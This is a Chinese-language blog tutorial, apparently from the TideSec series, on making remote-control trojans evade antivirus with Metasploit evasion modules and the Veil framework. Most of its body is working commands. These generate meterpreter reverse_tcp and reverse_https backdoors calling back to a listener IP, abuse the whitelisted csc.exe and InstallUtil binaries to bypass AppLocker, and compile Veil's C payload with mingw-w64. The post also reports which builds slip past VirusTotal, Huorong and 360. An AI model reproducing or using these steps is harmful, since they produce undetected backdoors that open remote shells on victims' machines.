Evasion模块

参考链接：

applocker_evasion_install_util.md:

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md

基于白名单Csc.exe执行payload：https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji

使用veil绕过杀软：https://blog.csdn.net/wyf12138/article/details/79825833

免杀后门之MSF&Veil-Evasion的完美结合http://www.secist.com/archives/1107.html

APT级的全面免杀:https://xz.aliyun.com/t/4191

生成exe（VT查杀率42/71）

show evasion
use windows/windows_defender_exe
set filename test.exe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs

virustotal.com中42/71个报毒

火绒以及360都会拦

生成hta(VT查杀率23/58)

show evasion
use windows/windows_defender_js_hta
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs

可以过火绒，但是不能过360（但是vt上没报毒，所以vt上有时候并不准）

生成install_util(VT查杀率14/70)

use windows/applocker_evasion_install_util
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.138
set lport 3333
run

根据说明，需要使用csc.exe进行编译一下，然后用InstallUtil.exe加载文件。

csc.exe是微软.NET Framework 中的C#语言编译器，本机安装了.net后就可以找到该文件。我这里用vs2019里的csc.exe进行编译，生成install_util.exe。

Csc.exe /out:install_util.exe c:\install_util.txt

直接执行install_util.exe是没有任何反应的，需要使用InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe来加载。

可以成功

不过这个的应用难度比较大，需要目标机上面有.net环境，而且现今各种杀软对.net的查杀都比较严重，所以应用场景一般，而且如果打包把环境拷贝的话，更是加大了木马的体积，更容易被发现

而且在2019年1月msf5更新的不止evasion模块，还有个更强大的模板编译函数Metasploit::Framework::Compiler，提供了更强大的自定义免杀机制。后面文章会讲述该模块使用。

Veil免杀

Veil、Venom和Shellter是三大老牌免杀工具，虽然说人怕出名猪怕壮，但目前这几款免杀工具在扩展性和免杀能力方面依然有着不错的表现。

Veil-Evasion是一个用python写的免杀框架，可以将任意脚本或一段shellcode转换成Windows可执行文件，还能利用Metasploit框架生成相兼容的Payload工具，从而逃避了常见防病毒产品的检测。

Veil的安装

安装参考：https://www.freebuf.com/sectool/89024.html

kali快速安装

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

亲身体验过，安装以及执行会出现各种问题，依赖包也会出现各种问题，无论是快速安装还是常规手动安装都没能解决。开始以为自己的问题，后来发现其他人也有一样的困惑，但是也有其他人一遍成功。。。

后来，发现有人做好了veil的docker镜像，简单便捷，一键运行。

Docker安装

apt install dockerapt install docker-compose

在kali里安装docker后，添加docker加速镜像地址:

vi /etc/docker/daemon.json

{"registry-mirrors": ["https://1nj0zren.mirror.aliyuncs.com","https://docker.mirrors.ustc.edu.cn","http://f1361db2.m.daocloud.io","https://registry.docker-cn.com"]
}

systemctl daemon-reload
systemctl restart docker
docker pull mattiasohlsson/veil
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

-v /tmp/veil-output:/var/lib/veil/output:Z是将宿主机的/tmp/veil-output目录映射到docker里面，这样veil生成的payload可以直接在宿主机里使用。

Docker ps查看镜像

docker exec -it a61373de85e9 /bin/bash

然后Veil命令即可进入veil的界面

veil使用

veil有两个免杀的工具，Evasion和Ordnance。

Ordnance可生成在Veil-Evasion中使用的shellcode，Evasion是用做文件免杀。

我们一般选择Evasion

use 1
list

推荐使用以go和ruby语言encode的编码方式。像python这类的与用户有较高的交互就容易被查杀。

veil原理可以参考这篇文章：https://xz.aliyun.com/t/4191

使用veil直接生成exe(VT查杀率43/69)

我们使用go语言生成msf的payload

use 15
set lhost 192.168.42.138
set lport 3334
generate

名称：go_msf

因为之前已经做过映射，所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。

Msf中进行监听：

use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.42.138
set lport 3334
run

可以过火绒，但是过不了360，缺点是体积太大了，go语言生成的exe大约2M,python生成的exe大约4M，ruby生成的exe大约700K，相比msf原生态的exe大打多了。而且vt的效果：

使用veil+mingw-w64(VT查杀率4/71)

use 1
use 7            （选择payload  c/meterpreter/rev_tcp.py）
set lhost 192.168.42.138
set lport 3333
generate

生成文件名为c_msf

这个步骤生成了一个可以被msf利用的c_msf.c，然后用mingw-w64编译

mingw-w64的安装可参考https://zhuanlan.zhihu.com/p/76613134

安装完成mingw-w64之后输入命令：

gcc c_msf.c -o c_msf.exe -lwsock32

编译完成，然后进行测试

kali端：

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.138
set lport 3333
run

然后靶机运行编译生成的c_msf.exe木马

WTF!!!!!!

上线立刻掉线，搞不懂，不过过了360和火绒

而且vt效果出奇的好

这和重剑无锋大佬的结果有很大出入，待我回去仔细研究一波（换了端口试验了一下，不行，猜测和mingw-w64的版本有关）

如果哪位大佬试验成功，请务必私信我，灰常感谢

veil功能还是很强大的，生成的shellcode自身免杀能力就不错，而且支持多种语言的shellcode编译打包，和msf及cs可以无缝对接，值得人好好研究一下。三大老牌免杀工具不是浪得虚名的~~

TideSec远控免杀学习二（Evasion模块+veil）相关推荐

TideSec远控免杀学习一（免杀基础+msfvenom隐藏的参数）
参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料免杀技术有一套:https://anhkgg.com/aanti-virus/ ...
TideSec远控免杀学习三（Venom+Shellter）
参考链接: 利用meterpreter下的Venom免杀后门:https://www.cnblogs.com/wh4am1/p/7469625.html 免杀后门venom :https://www. ...
远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
远控免杀从入门到实践（1）：基础篇
郑重声明 1.文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 2.文中提到的杀软检测指标是 virustotal.com(简称 ...
远控免杀专题(67)-白名单(113个)总结篇
关于白名单程序相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称"Living-Off-the-Land Binaries",直白翻译 ...
远控免杀从入门到实践(3)-代码篇-C/C++
郑重声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! <远控免杀从入门到实践>系列文章目录: 1.远控免杀从 ...

TideSec远控免杀学习二（Evasion模块+veil）